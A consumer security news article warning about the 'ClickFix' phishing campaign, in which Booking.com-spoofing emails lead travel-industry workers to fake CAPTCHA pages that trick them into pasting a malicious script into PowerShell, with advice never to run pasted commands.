This Dangerous Email Tricks You Into Hacking Your Own PC

Be cautious when browsing the internet, as a new wave of "scam yourself" attacks has been making the rounds. These sophisticated phishing emails have been successfully tricking people into compromising their own computers.

The ClickFix attack is a cleverly designed scam that begins with users being lured to visit seemingly legitimate but compromised websites. Once on these sites, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal. This "sophisticated form of social engineering" manipulates users into executing malicious scripts.

One particularly devious example has been identified by Cofense, which targets businesses in the travel industry. The email purports to be from market giant Booking.com, warning that a customer has made a serious complaint and giving the recipient a time-boxed opportunity to respond using the link provided.

"These campaigns generally provide Booking.com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers," says Cofense. The campaign "preys on the recipient's fear of leaving a guest dissatisfied" and might "claim that a guest was trying to contact the hotel but was unable to get a response."

Not all these attacks are negative, some suggest requests or questions from future (imaginary) guests, while also providing a link for the hotel operator to respond. However, despite the lure, the attack is the same as all the others.

The emails used in these campaigns will sometimes state that the embedded link only works on Windows computers, simply because this malware only infects Windows PCs. But the most blatant tell is the CAPTCHA "Robot or Human?" challenge, which instructs the user to open a Windows prompt and paste in the text on the PC's clipboard, and then press Enter.

"Absent a few wording changes, there is no variation in this part of the attack," says Cofense. "It's the most blatant tell." So, what should you do if you receive one of these emails? In theory, at least, you know better, but cybercriminals will try nonetheless.

Once you know about ClickFix, it's essential to be vigilant and never paste in copied text and hit Enter. Whether it's a CAPTCHA, a secure website or document restriction, or a technical fault, it's always an attack. And the hacker is always you. Remember, if an email seems too good (or bad) to be true, it probably is.